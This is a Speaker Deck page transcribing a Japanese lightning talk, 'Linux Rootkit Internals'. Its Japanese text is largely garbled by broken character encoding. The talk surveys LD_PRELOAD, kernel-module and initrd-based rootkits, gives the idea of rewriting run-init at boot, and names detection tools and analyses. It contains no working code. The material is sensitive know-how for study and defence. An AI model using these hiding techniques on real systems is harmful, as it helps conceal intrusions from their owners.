Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up
for free
Linux Rootkit Internals
@tkmru
December 23, 2017
Programming
1
1.2k
Linux Rootkit Internals
@tkmru
December 23, 2017
Tweet
Share
More Decks by @tkmru
See All by @tkmru
tkmru
2
370
tkmru
0
100
tkmru
0
2.5k
tkmru
18
9.4k
tkmru
0
150
tkmru
1
230
tkmru
0
160
tkmru
3
1.9k
Other Decks in Programming
See All in Programming
azdaroth
0
170
kazuki19992
0
450
itosho525
0
140
standfm
0
220
standfm
0
250
saki4869
0
190
dictoss
0
170
yaamaa
0
440
mizdra
7
4.9k
akatsukinewgrad
0
210
sullis
0
120
siketyan
1
110
Featured
See All Featured
destraynor
146
19k
kastner
54
1.9k
colly
66
3k
eileencodes
113
25k
brianwarren
83
4.7k
revolveconf
200
9.6k
geoffreycrofte
18
790
jonrohan
1021
380k
pauljervisheath
196
15k
rmw
11
740
roundedbygravity
84
7.8k
chrislema
231
16k
Transcript
Linux Rootkit Internals Cyber Wargame Christmas Party(େηΩϡϦςΟ) 12/23 @tkmru
ࣗݾհ • ͚ͨ·Δ(@tkmru) • CTFνʔϜ: TomoriNao • ಉਓࢽαʔΫϧ: TomoriNao •
ౙίϛʹམͪͨͷͰಉਓࢽʹॻ͘༧ఆͩͬ ͨωλΛൃද͠·͢
Rootkitͱ • ࡞ಈதͷϓϩηεϑΝΠϧɺϩάγες ϜσʔλΛӅ͢ϚϧΣΞ • ex) ps, topίϚϯυΛӅ͢ɺϚϧΣΞࣗମ ͷϑΝΠϧɺϓϩηεΛӅ͢ •
ࠓճͷLTͰରͱ͢ΔͷLinux͚ͷͷ
• GitHubʹOSSͱ͍ͯ͠Ζ͍Ζެ։͞Ε͍ͯΔ • ʢଟʣݚڀ༻ʁ • ϚϧΣΞͷίʔυ͕ಡΊΔʂʂ • ·ͱΊ: https://github.com/tkmru/awesome- linux-rootkits
GitHubʹίʔυ͕͋Δʂʂ
͍Ζ͍ΖͳLinux Rootkitͨͪ • LD_PRELOAD Rootkit • Kernel Module Rootkit •
Ramdisk based Rootkit
LD_PRELOAD Rootkit • ڥม LD_PRELOAD Λͬͯڞ༗ϥΠϒ ϥϦΛࠩ͠ସ͑Δ͜ͱ͕Ͱ͖Δ͜ͱΛͬͨ rootkit • ex)
Jinx2, vlany, azazel
LD_PRELOADͱ • ಡΈࠐ·ͤΔڞ༗ϥΠϒϥϦ(.so)ͷύεΛઃఆͰ͖Δ ڥม • γϯϘϧͷ໊લղܾͷͱ͖ γϯϘϧ໊͕িಥ͍ͯ͠Δͱ LD_PRELOADʹઃఆ͍ͯ͠Δ .so ͷؔΛ༏ઌͯ͠ಡ
Έʹߦ͘ • ͜ΕʹΑͬͯؔΛ্ॻ͖Ͱ͖ɺrootkitʹ༻͍Δ͜ͱ͕ Ͱ͖Δ
LD_PRELOADͱ $ ldd $(which ls) # ಈతϦϯΫ͞Ε͍ͯΔڞ༗ϥΠϒϥϦҰཡ linux-vdso.so.1 => (0x00007ffdc1b78000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fbe97fb5000) libacl.so.1 => /lib/x86_64-linux-gnu/libacl.so.1 (0x00007fbe97dad000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fbe979e3000) libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fbe977a5000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fbe975a1000) /lib64/ld-linux-x86-64.so.2 (0x000055f1ce4c8000) libattr.so.1 => /lib/x86_64-linux-gnu/libattr.so.1 (0x00007fbe9739b000) $ LD_PRELOAD=./hook.so /bin/ls # lsͷؔΛϑοΫ!!
Kernel Module Rootkit • Loadable Kernel ModuleΛར༻ͯ͠ɺkernel ͷػೳΛॻ͖͑Δrootkit • Kernel
rootkitɺLKM(Loadable Kernel Module) rootkitͱݴΘΕΔ • ex) adore, suterusu, diamorphine, etc
Kernel Moduleͱ • ਖ਼໘͔Β KernelͷίʔυʹखΛೖΕɺػೳΛՃ͠Α ͏ͱ͢Δͱɺ࠶ίϯύΠϧͯ͠Ϧϒʔτ͢Δඞཁ͕͋ Δ • Kernel ModuleΛ͏ͱɺΧδϡΞϧʹKernelʹػೳ
ΛՃͰ͖Δ • ਖ਼͘͠NICͷσόΠευϥΠόΛՃ͢ΔͨΊʹ ΘΕΔ
Kernel Module Rootkit • γεςϜίʔϧΛϑοΫ͢ΔKernel ModuleΛՃ͢Δ͜ͱͰ RootkitͷػೳΛ࣮ݱ͍ͯ͠Δ • ҎԼಈ࡞ྫ •
֘͢ΔγεςϜίʔϧΛϑοΫͯ͠ॲཧΛมߋ͢Δɻ • ϑΝΠϧͷݺͼग़͠ΛϦμΠϨΫτͯ͠ɺผͷόΠφϦΛ࣮ ߦͤ͞Δɻ • ࠷ऴతʹग़ྗ͞ΕΔใͷΈΛมߋ͢Δɻ
Ramdisk based Rootkit • initrd(ॳظRAMσΟεΫ)Λॻ͖͑Δ͜ͱʹΑΔ rootkit • ׂΓͱ৽͍͠λΠϓͷrootkit • ex)
Horse Pill: black hat USA 2016 • https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz- Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf
initrdͱ • ϑΝΠϧγεςϜΛϚϯτ͢ΔͨΊͷϑΝΠϧ Λѹॖͨ͠ͷ • ॳظͷϒʔτϓϩηεͰΘΕΔ • initrd ͕ϩʔυ͞ΕΔͱɺϑΝΠϧɾγεςϜΛ ༻Մೳʹ͢ΔͨΊͷkernel
moduleͳͲ͕ಡΈࠐ· Εɺ/ ҎԼͷϑΝΠϧγεςϜ͕Ϛϯτ͞ΕΔ
ϒʔτϓϩηεͷͲͷล͔ʁ • UEFI • shim • grub • linooks •
initrd • systemd • app
$ ls -l /boot (Ұ෦লུ) drwxr-xr-x 5 root root 4096
Dec 9 06:40 grub -rw-r--r-- 1 root root 20566118 Dec 9 06:41 initrd.img-3.19.0-80- generic kernelΑΓ৽͍͠ -rw------- 1 root root 6595152 Jan 13 2017 vmlinuz-3.19.0-80-generic ɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹɹinitrdΑΓ৽͍͠ initrdΛݟͯΈΔ • /bootҎԼʹγεςϜʹΑͬͯಈతʹੜ͞ΕΔ • ͳͥʁ • ڥͷࠩҟʢϋʔυΤΞɺϑΝΠϧγεςϜ etcʣʹΑͬͯϑΝΠ ϧΛม͑Δඞཁ͕͋Δ • ιϑτΣΞɾΞοϓσʔτʹΑͬͯಈతʹߋ৽͞ΕΔ
$ file /boot/initrd.img-3.19.0-80-generic /boot/initrd.img-3.19.0-80-generic: gzip compressed data, from Unix, last
modified: Sat Dec 9 06:40:55 2017 $ gunzip --to-stdout /boot/initrd.img-3.19.0-80-generic | cpio -tvɹ(Ұ෦লུ) -rwxr-xr-x 1 root root 1600 Jun 13 2017 bin/insmod -rwxr-xr-x 1 root root 976 Jun 13 2017 bin/dmesg -rwxr-xr-x 1 root root 4872 Jun 13 2017 bin/run-init -rwxr-xr-x 1 root root 3904 Jun 13 2017 bin/dd • gzipͰѹॖ͞Ε͍ͯΔ • ίϚϯυͷόΠφϦɺϑΝʔϜΣΞͳͲ͕ ؚ·Ε͍ͯΔ initrdΛݟͯΈΔ
initrdΛͲ͏͏ͷ͔ • initrdͷதʹ͋Δ run-init Λॻ͖͑Δ • ϒʔτ࣌ʹrootkitͷϓϩηεΛੜ͢Δ • initrdಈతʹੜ͞ΕɺγεςϜͷߋ৽ʹ Α͕ͬͯ࣌มΘΔͷͰɺॻ͖͑ͯؾ͔ͮ
Εʹ͍͘
͓ΘΓʹ • ࠓlinux rootkit͕linuxͷͲΜͳΈΛ͍ͬͯΔ͔ հ͠·ͨ͠ • ݕ͢ΔʹɺOSSECchkrootkit, rkhunterͱ͍ͬͨ πʔϧ͕͋Δ •
OSSͱͯ͠ެ։͞Ε͍ͯΔrootkitΛͲΕ͘Β͍ݕͰ͖Δ ͔ࠓޙ͍ͬͯ͘ • ࣍ճ࡞ʹظ͍ͯͩ͘͠͞ʂʂʂ
ࢀߟࢿྉ • The magic of LD_PRELOAD for Userland Rootkits |
FlUxIuS' Blog (http:// fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland- rootkits/) • ΤϯλʔϓϥΠζɿୈ5ճɹkernel rootkitͷ֓ཁ (http://www.itmedia.co.jp/ enterprise/0306/10/epn12.html) • ˏITɿΠϯγσϯτϨεϙϯε͡ΊͷҰา ୈ4ճ ৵ೖऀֻ͕͚ΔLKM rootkit ͷ࣮ (http://www.atmarkit.co.jp/fsecurity/rensai/rootkit04/rootkit02.html) • The Horse Pill Rootkit vs. Forcepoint Threat Protection for Linux | Forcepoint (https://blogs.forcepoint.com/security-labs/horse-pill-rootkit-vs-forcepoint- threat-protection-linux)
ղੳʹཱͭࢿྉ Linux Rootkit Detection With OSSEC • https://www.sans.org/reading-room/whitepapers/detection/rootkit- detection-ossec-34555 •
OSSECʹΑΔRootkitݕग़ʹ͍ͭͯॻ͔ΕͨSANS͕ग़͍ͯ͠Δࢿྉ Malware memory analysis of the Jynx2 Linux rootkit (Part 1) • http://www.dtic.mil/get-tr-doc/pdf?AD=AD1004190 • VolatilityΛͬͯJynx2ͷϝϞϦμϯϓΛղੳ͢ΔDRDC(ΧφμӴݚڀ։ ൃ)ͷࢿྉ